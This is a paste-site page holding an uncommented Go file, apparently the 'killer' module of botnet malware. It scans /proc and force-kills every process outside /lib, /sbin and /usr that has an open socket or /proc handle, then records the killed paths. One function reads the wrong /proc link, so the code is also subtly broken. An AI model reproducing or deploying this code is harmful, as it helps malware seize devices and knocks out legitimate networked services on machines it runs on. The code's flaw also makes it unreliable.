Untitled

mail@pastecode.io avatar
unknown
golang
a year ago
2.9 kB
23
Indexable
Never
package main

import (
    "fmt"
	"io/ioutil"
	"os"
	"path/filepath"
	"strconv"
	"strings"
	"syscall"
)

type Killer struct {
	RealPath string
}

var killers []Killer

func CheckPaths(file, path string) bool {
	if strings.HasPrefix(file, "/lib/") ||
		strings.HasPrefix(file, "/sbin/") ||
		strings.HasPrefix(file, "/usr/") ||
		file == path {
		return true
	}
	return false
}

func FindRealPath(file string) bool {
	for _, k := range killers {
		if strings.Contains(k.RealPath, file) {
			return true
		}
	}
	return false
}

func AddProcess(file string) {
	killers = append(killers, Killer{RealPath: file})
}

func KillProcess(pid int) error {
	return syscall.Kill(pid, syscall.SIGKILL)
}

func ShootList(realPath string) {
	pids, err := ioutil.ReadDir("/proc")
	if err != nil {
		return
	}

	for _, pidEntry := range pids {
		pid, err := strconv.Atoi(pidEntry.Name())
		if err != nil || pid == os.Getpid() || pid == os.Getppid() {
			continue
		}

		exePath, err := os.Readlink(filepath.Join("/proc", pidEntry.Name()))
		if err != nil {
			continue
		}

		if CheckPaths(exePath, realPath) {
			continue
		}

		fdDir := filepath.Join("/proc", pidEntry.Name(), "fd")
		fdEntries, err := ioutil.ReadDir(fdDir)
		if err != nil {
			continue
		}

		for _, fdEntry := range fdEntries {
			fdPath, err := os.Readlink(filepath.Join(fdDir, fdEntry.Name()))
			if err != nil {
				continue
			}

			if strings.Contains(fdPath, "socket:") || strings.Contains(fdPath, "/proc") {
				if err := KillProcess(pid); err == nil {
					fmt.Printf("[Killer] Found and killed process %d - Path: %s\n", pid, exePath)
					if !FindRealPath(exePath) {
						AddProcess(exePath)
					}
					break
				}
			}
		}
	}
}

func Start(realPath string) {
	procDir := "/proc"
	pids, err := ioutil.ReadDir(procDir)
	if err != nil {
		return
	}

	for _, pidEntry := range pids {
		pid, err := strconv.Atoi(pidEntry.Name())
		if err != nil || pid == os.Getpid() || pid == os.Getppid() {
			continue
		}

		exePath, err := os.Readlink(filepath.Join(procDir, pidEntry.Name(), "exe"))
		if err != nil {
			continue
		}

		if CheckPaths(exePath, realPath) {
			continue
		}

		fdDir := filepath.Join(procDir, pidEntry.Name(), "fd")
		fdEntries, err := ioutil.ReadDir(fdDir)
		if err != nil {
			continue
		}

		for _, fdEntry := range fdEntries {
			fdPath, err := os.Readlink(filepath.Join(fdDir, fdEntry.Name()))
			if err != nil {
				continue
			}

			if strings.Contains(fdPath, "socket:") || strings.Contains(fdPath, "/proc") {
				if err := KillProcess(pid); err == nil {
					fmt.Printf("[Killer] Found and killed process %d - Path: %s\n", pid, exePath)
					AddProcess(exePath)
					break
				}
			}
		}
	}

	ShootList(realPath)
}

func StartKiller() {
	executablePath, err := os.Executable()
	if err != nil {
		return
	}

	realPath, err := filepath.Abs(executablePath)
	if err != nil {
		return
	}

	Start(realPath)
}